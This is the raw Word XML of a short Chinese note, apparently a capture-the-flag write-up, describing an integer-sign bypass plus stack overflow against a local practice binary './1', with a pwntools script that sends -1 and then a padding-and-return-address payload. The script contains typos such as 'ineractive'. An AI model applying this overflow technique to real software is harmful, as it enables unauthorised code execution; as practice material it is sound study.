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65C4" w14:textId="23FFB51D" w:rsidR="00E354C9" w:rsidRDefault="005B4193">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用unsigned+栈溢出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1035F4B6" w14:textId="1DADD1D8" w:rsidR="005B4193" w:rsidRDefault="005B4193">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exp：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD39077" w14:textId="657D512B" w:rsidR="005B4193" w:rsidRDefault="005B4193">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>From pwn import*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756DEAC1" w14:textId="5E339D67" w:rsidR="005B4193" w:rsidRDefault="005B4193">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Io=process(</w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>./1</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D62EB79" w14:textId="5220D609" w:rsidR="005B4193" w:rsidRDefault="005B4193">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Io.sendline(b</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC5A74A" w14:textId="78403B5F" w:rsidR="005B4193" w:rsidRDefault="005B4193">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Payload=b</w:t>
      </w:r>
      <w:r>
        <w:t>’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>*0x44+p32(0x</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4193">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4011DB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7C3896" w14:textId="0BD97A44" w:rsidR="005B4193" w:rsidRDefault="005B4193">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Io.sendline(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C42E68C" w14:textId="5F441F20" w:rsidR="005B4193" w:rsidRPr="005B4193" w:rsidRDefault="005B4193">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Io.ineractive()</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="005B4193" w:rsidRPr="005B41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8C3D1" w14:textId="77777777" w:rsidR="005F74A2" w:rsidRDefault="005F74A2" w:rsidP="005B41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341EC6" w14:textId="77777777" w:rsidR="005F74A2" w:rsidRDefault="005F74A2" w:rsidP="005B41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3045" w14:textId="77777777" w:rsidR="005F74A2" w:rsidRDefault="005F74A2" w:rsidP="005B41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76480E" w14:textId="77777777" w:rsidR="005F74A2" w:rsidRDefault="005F74A2" w:rsidP="005B41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C9"/>
    <w:rsid w:val="005B4193"/>
    <w:rsid w:val="005F74A2"/>
    <w:rsid w:val="00E354C9"/>
    <w:rsid w:val="00FC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3BC83"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8193286D-DE27-444E-8D98-1464167C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54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4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4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4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4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4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4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4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4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5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5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54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54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54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54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4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54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54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4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4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4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4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4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4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54C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41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41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41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41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2026-05-23T09:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-23T09:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>